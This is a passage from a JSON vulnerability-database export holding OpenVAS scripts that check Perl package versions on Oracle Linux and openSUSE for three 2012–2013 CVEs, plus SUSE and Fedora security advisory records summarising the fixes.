rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Digest-SHA\", rpm:\"perl-Digest-SHA~5.47~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-CBuilder\", rpm:\"perl-ExtUtils-CBuilder~0.27~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-Embed\", rpm:\"perl-ExtUtils-Embed~1.28~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-MakeMaker\", rpm:\"perl-ExtUtils-MakeMaker~6.55~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-ExtUtils-ParseXS\", rpm:\"perl-ExtUtils-ParseXS~2.2003.0~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-File-Fetch\", rpm:\"perl-File-Fetch~0.26~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Base\", rpm:\"perl-IO-Compress-Base~2.020~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Bzip2\", rpm:\"perl-IO-Compress-Bzip2~2.020~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-IO-Compress-Zlib\", rpm:\"perl-IO-Compress-Zlib~2.020~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-IO-Zlib\", rpm:\"perl-IO-Zlib~1.09~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-IPC-Cmd\", rpm:\"perl-IPC-Cmd~0.56~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Locale-Maketext-Simple\", rpm:\"perl-Locale-Maketext-Simple~0.18~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Log-Message\", rpm:\"perl-Log-Message~0.02~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Log-Message-Simple\", rpm:\"perl-Log-Message-Simple~0.04~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Module-Build\", rpm:\"perl-Module-Build~0.3500~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Module-CoreList\", rpm:\"perl-Module-CoreList~2.18~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Module-Load\", rpm:\"perl-Module-Load~0.16~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Module-Load-Conditional\", rpm:\"perl-Module-Load-Conditional~0.30~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Module-Loaded\", rpm:\"perl-Module-Loaded~0.02~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Module-Pluggable\", rpm:\"perl-Module-Pluggable~3.90~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Object-Accessor\", rpm:\"perl-Object-Accessor~0.34~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Package-Constants\", rpm:\"perl-Package-Constants~0.02~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Params-Check\", rpm:\"perl-Params-Check~0.26~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Parse-CPAN-Meta\", rpm:\"perl-Parse-CPAN-Meta~1.40~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Pod-Escapes\", rpm:\"perl-Pod-Escapes~1.04~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Pod-Simple\", rpm:\"perl-Pod-Simple~3.13~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Term-UI\", rpm:\"perl-Term-UI~0.20~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Test-Harness\", rpm:\"perl-Test-Harness~3.17~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Test-Simple\", rpm:\"perl-Test-Simple~0.92~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Time-HiRes\", rpm:\"perl-Time-HiRes~1.9721~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-Time-Piece\", rpm:\"perl-Time-Piece~1.15~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-core\", rpm:\"perl-core~5.10.1~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-devel\", rpm:\"perl-devel~5.10.1~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-libs\", rpm:\"perl-libs~5.10.1~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-parent\", rpm:\"perl-parent~0.221~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-suidperl\", rpm:\"perl-suidperl~5.10.1~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"perl-version\", rpm:\"perl-version~0.77~130.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:40:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2013-11-19T00:00:00", "id": "OPENVAS:1361412562310850455", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850455", "type": "openvas", "title": "openSUSE: Security Advisory for update (openSUSE-SU-2013:0497-1)", "sourceData": "# Copyright (C) 2013 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850455\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-11-19 14:06:03 +0530 (Tue, 19 Nov 2013)\");\n script_cve_id(\"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"openSUSE-SU\", value:\"2013:0497-1\");\n script_name(\"openSUSE: Security Advisory for update (openSUSE-SU-2013:0497-1)\");\n\n script_tag(name:\"affected\", value:\"update on openSUSE 12.2, openSUSE 12.1\");\n\n script_tag(name:\"insight\", value:\"Perl was updated to fix 3 security issues:\n\n - fix rehash denial of service (compute time) [bnc#804415]\n [CVE-2013-1667]\n\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n\n - sanitize input in Maketext.pm to avoid code injection\n [bnc#797060] [CVE-2012-6329]\n\n In openSUSE 12.1 also the following non-security bug was\n fixed:\n\n - fix IPC::Open3 bug when '-' is used [bnc#755278]\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'update'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE12\\.2|openSUSE12\\.1)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE12.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.16.0~3.5.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-base\", rpm:\"perl-base~5.16.0~3.5.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-base-debuginfo\", rpm:\"perl-base-debuginfo~5.16.0~3.5.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-debuginfo\", rpm:\"perl-debuginfo~5.16.0~3.5.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-debugsource\", rpm:\"perl-debugsource~5.16.0~3.5.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-32bit\", rpm:\"perl-32bit~5.16.0~3.5.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-base-32bit\", rpm:\"perl-base-32bit~5.16.0~3.5.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-base-debuginfo-32bit\", rpm:\"perl-base-debuginfo-32bit~5.16.0~3.5.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-debuginfo-32bit\", rpm:\"perl-debuginfo-32bit~5.16.0~3.5.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-doc\", rpm:\"perl-doc~5.16.0~3.5.1\", rls:\"openSUSE12.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSE12.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.14.2~9.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-base\", rpm:\"perl-base~5.14.2~9.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-base-debuginfo\", rpm:\"perl-base-debuginfo~5.14.2~9.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-debuginfo\", rpm:\"perl-debuginfo~5.14.2~9.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-debugsource\", rpm:\"perl-debugsource~5.14.2~9.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-32bit\", rpm:\"perl-32bit~5.14.2~9.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-base-32bit\", rpm:\"perl-base-32bit~5.14.2~9.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-base-debuginfo-32bit\", rpm:\"perl-base-debuginfo-32bit~5.14.2~9.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-debuginfo-32bit\", rpm:\"perl-debuginfo-32bit~5.14.2~9.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-doc\", rpm:\"perl-doc~5.14.2~9.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-base-debuginfo-x86\", rpm:\"perl-base-debuginfo-x86~5.14.2~9.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-base-x86\", rpm:\"perl-base-x86~5.14.2~9.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-debuginfo-x86\", rpm:\"perl-debuginfo-x86~5.14.2~9.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-x86\", rpm:\"perl-x86~5.14.2~9.1\", rls:\"openSUSE12.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-01-24T11:09:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "Check for the Version of update", "modified": "2018-01-24T00:00:00", "published": "2013-11-19T00:00:00", "id": "OPENVAS:850455", "href": "http://plugins.openvas.org/nasl.php?oid=850455", "type": "openvas", "title": "SuSE Update for update openSUSE-SU-2013:0497-1 (update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2013_0497_1.nasl 8509 2018-01-24 06:57:46Z teissa $\n#\n# SuSE Update for update openSUSE-SU-2013:0497-1 (update)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850455);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-19 14:06:03 +0530 (Tue, 19 Nov 2013)\");\n script_cve_id(\"CVE-2012-5526\", \"CVE-2012-6329\", \"CVE-2013-1667\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"openSUSE-SU\", value: \"2013:0497_1\");\n script_name(\"SuSE Update for update openSUSE-SU-2013:0497-1 (update)\");\n\n tag_insight = \"\n Perl was updated to fix 3 security issues:\n\n - fix rehash denial of service (compute time) [bnc#804415]\n [CVE-2013-1667]\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n - sanitize input in Maketext.pm to avoid code injection\n [bnc#797060] [CVE-2012-6329]\n\n In openSUSE 12.1 also the following non-security bug was\n fixed:\n - fix IPC::Open3 bug when '-' is used [bnc#755278]\";\n\n tag_affected = \"update on openSUSE 12.2, openSUSE 12.1\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of update\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE12.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.16.0~3.5.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-base\", rpm:\"perl-base~5.16.0~3.5.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-base-debuginfo\", rpm:\"perl-base-debuginfo~5.16.0~3.5.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-debuginfo\", rpm:\"perl-debuginfo~5.16.0~3.5.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-debugsource\", rpm:\"perl-debugsource~5.16.0~3.5.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-32bit\", rpm:\"perl-32bit~5.16.0~3.5.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-base-32bit\", rpm:\"perl-base-32bit~5.16.0~3.5.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-base-debuginfo-32bit\", rpm:\"perl-base-debuginfo-32bit~5.16.0~3.5.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-debuginfo-32bit\", rpm:\"perl-debuginfo-32bit~5.16.0~3.5.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-doc\", rpm:\"perl-doc~5.16.0~3.5.1\", rls:\"openSUSE12.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE12.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.14.2~9.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-base\", rpm:\"perl-base~5.14.2~9.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-base-debuginfo\", rpm:\"perl-base-debuginfo~5.14.2~9.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-debuginfo\", rpm:\"perl-debuginfo~5.14.2~9.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-debugsource\", rpm:\"perl-debugsource~5.14.2~9.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-32bit\", rpm:\"perl-32bit~5.14.2~9.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-base-32bit\", rpm:\"perl-base-32bit~5.14.2~9.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-base-debuginfo-32bit\", rpm:\"perl-base-debuginfo-32bit~5.14.2~9.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-debuginfo-32bit\", rpm:\"perl-debuginfo-32bit~5.14.2~9.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-doc\", rpm:\"perl-doc~5.14.2~9.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-base-debuginfo-x86\", rpm:\"perl-base-debuginfo-x86~5.14.2~9.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-base-x86\", rpm:\"perl-base-x86~5.14.2~9.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-debuginfo-x86\", rpm:\"perl-debuginfo-x86~5.14.2~9.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"perl-x86\", rpm:\"perl-x86~5.14.2~9.1\", rls:\"openSUSE12.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T11:28:41", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "Perl was updated to fix 3 security issues:\n\n - fix rehash denial of service (compute time) [bnc#804415]\n [CVE-2013-1667]\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n - sanitize input in Maketext.pm to avoid code injection\n [bnc#797060] [CVE-2012-6329]\n\n", "edition": 1, "modified": "2013-03-20T14:04:22", "published": "2013-03-20T14:04:22", "id": "OPENSUSE-SU-2013:0502-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00038.html", "type": "suse", "title": "update for perl (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:17:41", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329"], "description": "Perl was updated to fix 3 security issues:\n\n - fix rehash denial of service (compute time) [bnc#804415]\n [CVE-2013-1667]\n - improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n - sanitize input in Maketext.pm to avoid code injection\n [bnc#797060] [CVE-2012-6329]\n\n In openSUSE 12.1 also the following non-security bug was\n fixed:\n - fix IPC::Open3 bug when '-' is used [bnc#755278]\n\n", "edition": 1, "modified": "2013-03-20T11:05:11", "published": "2013-03-20T11:05:11", "id": "OPENSUSE-SU-2013:0497-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00037.html", "type": "suse", "title": "update for perl (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:48:10", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329", "CVE-2011-2728"], "description": "This update of Perl 5 fixes the following security issues:\n\n * fix rehash DoS [bnc#804415] [CVE-2013-1667]\n * improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n * fix glob denial of service [bnc#796014]\n [CVE-2011-2728]\n * sanitize input in Maketext.pm [bnc#797060]\n [CVE-2012-6329]\n", "edition": 1, "modified": "2013-03-13T00:05:35", "published": "2013-03-13T00:05:35", "id": "SUSE-SU-2013:0441-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00014.html", "type": "suse", "title": "Security update for Perl (important)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:40:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1667", "CVE-2012-5526", "CVE-2012-6329", "CVE-2011-2728"], "description": "This update of Perl 5 fixes the following security issues:\n\n * fix rehash DoS [bnc#804415] [CVE-2013-1667]\n * improve CGI crlf escaping [bnc#789994] [CVE-2012-5526]\n * fix glob denial of service [bnc#796014]\n [CVE-2011-2728]\n * sanitize input in Maketext.pm [bnc#797060]\n [CVE-2012-6329]\n * make getgrent work with long group entries\n [bnc#788388]\n", "edition": 1, "modified": "2013-03-13T00:05:41", "published": "2013-03-13T00:05:41", "id": "SUSE-SU-2013:0442-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00015.html", "title": "Security update for Perl (important)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329", "CVE-2013-1667"], "description": "Perl is a high-level programming language with roots in C, sed, awk and she ll scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A la rge proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. ", "modified": "2013-04-03T04:55:43", "published": "2013-04-03T04:55:43", "id": "FEDORA:8ABCA212D1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: perl-5.14.4-224.fc17", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-6329", "CVE-2013-1667"], "description": "Perl is a high-level programming language with roots in C, sed, awk and she ll scripting. Perl is good at handling processes and files, and is especially good at handling text. Perl's hallmarks are practicality and efficiency. While it is used to do a lot of different things, Perl's most common applications are system administration utilities and web programming. A la rge proportion of the CGI scripts on the web are written in Perl. You need the perl package installed on your system so that your system can handle Perl scripts. Install this package if you want to program in Perl or enable your system to handle Perl scripts. ", "modified": "2013-03-22T00:48:54", "published": "2013-03-22T00:48:54", "id": "FEDORA:2394F21ABD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: perl-5.16.2-240.fc18", "cvss": {"score": 7.5, "vector": 